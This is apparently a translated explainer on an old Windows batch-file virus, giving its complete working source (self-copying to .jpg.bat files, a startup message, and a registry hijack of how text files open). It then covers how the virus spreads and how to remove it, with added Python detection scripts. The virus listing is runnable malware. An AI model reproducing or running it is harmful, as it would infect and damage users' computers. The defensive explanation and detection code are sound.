You may remember that a few years ago there were viruses that duplicated themselves by abusing file extensions. One type of computer virus is made from batch files. As long as batch files can still run on the operating system, this type of file can still be used for bad purposes.
Basically, the contents of a batch file are a sequence of DOS commands, and you need nothing more than NOTEPAD to write them. Simple, isn't it? But do not shrug it off: those of you who have been victims of this virus already know its effects.
This virus works with double extensions. When clicked, it copies itself using the names of the JPG (image) files in the same folder. For example, if the folder contains a file named sexy.jpg, the batch file copies itself to a new file named sexy.jpg.bat.
Besides imitating files with the JPG extension, this virus also duplicates itself alongside files with the TXT extension.
The technique this virus uses to infect files relies on the TXT extension. If a folder contains a file with the TXT extension and we open it, the virus automatically goes into that folder. This works because the listing below replaces the command that Windows runs when a TXT file is opened.
1 | @Echo off |
2 | If not Exist C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat Copy %0 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat >Null |
3 |
If not Exist
C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri
Goto message
|
4 | Goto Infect |
5 | |
6 | :message |
7 | Echo You are under attack! >message.wri |
8 | Echo Your PC no longer safe. >>message.wri |
9 | Echo It's time to lay eggs and breed. >>message.wri |
10 | Copy message.wri C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri >Null |
11 | |
12 | Echo Windows Registry Editor Version 5.00 >Infect.reg |
13 | Echo. >>Infect.reg |
14 | Echo [HKEY_CLASSES_ROOT\txtfile\shell\open\command] >>Infect.reg |
15 | Echo @=hex(2) :43, 00, 3a, 00, 5c, 00, 44, 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, \ >>Infect.reg |
16 | Echo 00, 20, 00, 61, 00, 6e, 00, 64, 00, 20, 00, 53, 00, 65, 00, 74, 00, 74, 00, 69, 00, 6e, 00, 67, 00, \ >>Infect.reg |
17 | Echo 73, 00, 5c, 00, 41, 00, 6c, 00, 6c, 00, 20, 00, 55, 00, 73, 00, 65, 00, 72, 00, 73, 00, 5c, 00, 44, \ >>Infect.reg |
18 | Echo 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, 00, 5c, 00, 52, 00, 65, 00, 61, 00, \ >>Infect.reg |
19 | Echo 64, 00, 6d, 00, 65, 00, 2e, 00, 62, 00, 61, 00, 74, 00, 20, 00, 25, 00, 31, 00, 00, 00 >>Infect.reg |
20 | |
21 | Copy Infect.reg c:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg >Null |
22 | C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg |
23 | @Del Infect.reg |
24 | @Del C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg |
25 | |
26 | :Infect |
27 | Start %SystemRoot%\system32\NOTEPAD.EXE %1 |
28 | Copy %0 %1.bat >Null |
29 | For %%A in (*.Jpg) do type %0 >%%A.bat |
30 | @Del null |
31 | Exit |
Above are the DOS commands contained in the BAT file that serves as the virus.
How does a virus like this first infect our computer?
The internet is like a minefield: if we are not careful, we can become victims. The virus starts spreading from the internet, then continues offline from one PC to another via USB flash drives, using an autorun script. The methods of infection are as follows:
1. Disguise.
The BAT file is created with a double file extension. The file name is made as attractive as possible so that the victim becomes curious and clicks the file (example: sexy.jpg.bat). The BAT extension is not visible when "Hide extensions for known file types" is enabled under "Folder Options". Victims of this method are usually people who do not understand file extensions.
2. Insertion into a setup file or application.
Virus makers are now very careful and work very neatly. Method number 1 is risky for them, because people are now wary of clicking a suspicious file. Instead, they insert the virus into a setup file. When the setup file or application is executed, the virus runs along with it and spreads easily.
What are the signs that my PC is infected with a virus of this type?
If your PC has been infected with this type of virus, your free hard disk space drops drastically because of the unreasonable swelling of files.
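
A more direct check than watching free disk space is to look for the double-extension copies themselves. The following is an added example, not part of the original article: a Python scan for names such as sexy.jpg.bat that also groups byte-identical hits, since every copy the virus makes is the same script. The `.cmd` extension, the function names and the sample folder contents are assumptions constructed for the demonstration.

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path

LURE_EXTS = {".jpg", ".txt"}    # extensions the article says the copies imitate
SCRIPT_EXTS = {".bat", ".cmd"}  # .cmd is an added assumption; the article shows .bat

def find_double_extension(root):
    """Return [(script_path, shadowed_file_or_None)] for names like photo.jpg.bat."""
    hits = []
    for path in sorted(Path(root).rglob("*")):
        ext = [s.lower() for s in path.suffixes]
        if (path.is_file() and len(ext) >= 2
                and ext[-1] in SCRIPT_EXTS and ext[-2] in LURE_EXTS):
            shadowed = path.with_suffix("")  # photo.jpg.bat -> photo.jpg
            hits.append((path, shadowed if shadowed.is_file() else None))
    return hits

def identical_copies(hits):
    """Group hits by SHA-256; a self-copying script leaves byte-identical files."""
    groups = defaultdict(list)
    for script, _ in hits:
        digest = hashlib.sha256(script.read_bytes()).hexdigest()
        groups[digest].append(script.name)
    return [sorted(names) for names in groups.values() if len(names) > 1]

def demo():
    """Run both checks on a constructed folder with harmless placeholder files."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "holiday.jpg").write_bytes(b"constructed image bytes")
        (root / "notes.txt").write_text("constructed note")
        for name in ("holiday.jpg.bat", "notes.txt.bat"):
            (root / name).write_text("rem constructed placeholder, same in every copy\n")
        (root / "build.bat").write_text("rem ordinary script, single extension\n")
        (root / "report.txt.bat").write_text("rem different content\n")
        hits = find_double_extension(root)
        return [(s.name, o.name if o else None) for s, o in hits], identical_copies(hits)

if __name__ == "__main__":
    names, groups = demo()
    print("double-extension scripts:", names)
    print("identical copies:", groups)
```

A hit that sits next to the file it imitates and shares its hash with other hits matches the copying behaviour described above; a lone hit with unique content deserves a look but may be an ordinary script with an unfortunate name.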
What should I do to fix it?
Run REGEDIT, go to
HKEY_CLASSES_ROOT\txtfile\shell\open\command
and change its value back to what it was before:
%SystemRoot%\system32\NOTEPAD.EXE %1
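
Before changing the value, it helps to see what it currently points to. The following is an added example, not part of the original article: it reads a .reg export of the key, decodes a `hex(2)` default value (UTF-16LE text) and classifies the handler. The sample export is constructed here from the path that the listing's hex bytes decode to; the function names and the list of script extensions are assumptions.

```python
import re

KEY = r"HKEY_CLASSES_ROOT\txtfile\shell\open\command"
EXPECTED = r"%SystemRoot%\system32\NOTEPAD.EXE %1"  # value the article restores
SCRIPT_EXTS = (".bat", ".cmd", ".vbs", ".js")       # assumed list of script types

def decode_hex2(value):
    """Decode a .reg 'hex(2):' value (REG_EXPAND_SZ stored as UTF-16LE)."""
    pairs = re.findall(r"[0-9a-fA-F]{2}", value.split(":", 1)[1])
    return bytes(int(p, 16) for p in pairs).decode("utf-16-le").rstrip("\x00")

def default_commands(reg_text):
    """Map each [key] in a .reg export to its decoded default (@) value."""
    joined = re.sub(r"\\[ \t]*\r?\n[ \t]*", "", reg_text)  # undo "\" continuations
    found, key = {}, None
    for line in (l.strip() for l in joined.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith("@="):
            value = line[2:].strip()
            if value.lower().replace(" ", "").startswith("hex(2):"):
                found[key] = decode_hex2(value)
            else:  # plain string form: "C:\\path\\app.exe %1"
                found[key] = value.strip('"').replace("\\\\", "\\")
    return found

def assess(command):
    """Return 'ok', 'script-handler' (opens .txt via a script) or 'changed'."""
    if command.strip().lower() == EXPECTED.lower():
        return "ok"
    target = command.lower().split(" %1")[0].strip('" ')
    return "script-handler" if target.endswith(SCRIPT_EXTS) else "changed"

def to_hex2(command, width=25):
    """Render text the way a registry export writes hex(2), to build the sample."""
    pairs = [f"{b:02x}" for b in (command + "\x00").encode("utf-16-le")]
    rows = [",".join(pairs[i:i + width]) for i in range(0, len(pairs), width)]
    return "hex(2):" + ",\\\n  ".join(rows)

# Constructed sample export; the path is what the listing's hex bytes decode to.
HIJACKED = r"C:\Documents and Settings\All Users\Documents\Readme.bat %1"
SAMPLE = f"Windows Registry Editor Version 5.00\n\n[{KEY}]\n@={to_hex2(HIJACKED)}\n"

if __name__ == "__main__":
    for key, command in default_commands(SAMPLE).items():
        print(key, "->", command, "=>", assess(command))
```

A result of `script-handler` for this key means every TXT file opened on the machine is being routed through a script first, which is the condition the REGEDIT step above reverses.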
Tips to avoid the virus:
1. Turn off the "autorun" service on your PC (for CD/DVD ROM, USB flash and hard disk).
2. Do not install setup files from untrusted sources.
3. Do not click or execute suspicious files.
Other suggestions:
If your PC feels heavy when running an application, you should uninstall it.